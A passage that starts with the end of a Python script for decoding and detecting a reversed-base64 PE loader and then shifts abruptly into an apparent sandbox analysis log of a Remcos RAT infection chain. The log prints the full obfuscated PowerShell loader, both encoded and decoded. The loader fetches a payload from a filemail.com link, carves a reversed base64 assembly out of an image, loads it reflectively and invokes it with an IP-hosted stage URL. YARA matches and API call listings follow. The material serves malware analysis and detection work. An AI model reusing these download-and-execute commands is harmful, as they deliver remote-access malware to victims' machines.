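    return base64.b64decode(reversed_b64[::-1])


def find_reversed_pe_blobs(text: str, min_len: int = 64) -> list:
    """Scan arbitrary text for base64 runs that decode to a PE once reversed.
    Returns (offset, decoded_length) pairs."""
    hits = []
    for match in re.finditer(r"[A-Za-z0-9+/=]{%d,}" % min_len, text):
        run = match.group(0)
        if not run.endswith(REVERSED_MZ_TAIL):
            continue
        try:
            blob = base64.b64decode(run[::-1], validate=True)
        except ValueError:          # binascii.Error is a ValueError
            continue
        if blob[:2] == b"MZ":
            hits.append((match.start(), len(blob)))
    return hits


def build_sample_carrier():
    """Constructed input, not a real capture: a fake image file carrying a
    minimal MZ-headed blob between the markers, as the report's carrier did."""
    fake_pe = (b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56
               + b"PE\x00\x00" + bytes(range(64)))
    reversed_b64 = base64.b64encode(fake_pe).decode()[::-1]
    carrier = ("\x89PNG\r\n\x1a\n(image bytes would be here)\n"
               + START_FLAG + reversed_b64 + END_FLAG + "\n(trailing bytes)")
    return carrier, fake_pe


if __name__ == "__main__":
    # Shortened, constructed stand-in for the report's obfuscated command.
    sample = ("opiurl = ifdhttp://example.inv'+'alid/x.txtifd;"
              "opiitems 0Ql ForEach-Object { opi_ }")
    print(deobfuscate_command(sample))
    print(decode_reversed_url("txt.GDDRDH/54/92.022.3.291//:ptth"))
    carrier, expected = build_sample_carrier()
    payload = extract_reversed_payload(carrier)
    print("payload recovered:", payload == expected, "header:", payload[:2])
    print("reversed PE blobs at:", find_reversed_pe_blobs(carrier))
```

Run it against a saved copy of the carrier (or the PowerShell command line pulled from a process-creation event) to get the next-stage assembly and URL without executing anything; the `QqVT` check is cheap enough to run over proxy logs or sandboxed HTTP bodies as a first-pass filter for this loader family.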
                    Source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 7604, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process Stats: CPU usage > 49%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_04669F66
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_0466A8A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0041D071
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_004520D2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0043D098
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00437150
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_004361AA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00426254
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00431377
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0043651C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0041E5DF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0044C739
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_004367C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_004267CB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0043C9DD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00432A49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00436A8D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0043CC0C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00436D48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00434D22
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00426E73
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00440E20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0043CE3B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00412F45
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00452F00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00426FAD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 00401F66 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 004020E7 appears 40 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 004338A5 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: String function: 00433FB0 appears 55 times
                    Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                    Source: C:\Windows\SysWOW64\mshta.exe | Process created: Commandline size = 2069
                    Source: C:\Windows\SysWOW64\wscript.exe | Process created: Commandline size = 2362
                    Source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 7604, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@20/22@3/4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\seehavingfacingbestthignstogetmebackwithentiretimegreat[1].tiff
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-VCYBO3
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgwk5qel.12s.ps1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                    Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: seethebestthignswhichgivingbestopportunities.hta | ReversingLabs: Detection: 21%
                    Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\seethebestthignswhichgivingbestopportunities.hta"
                    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS"
                    Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = 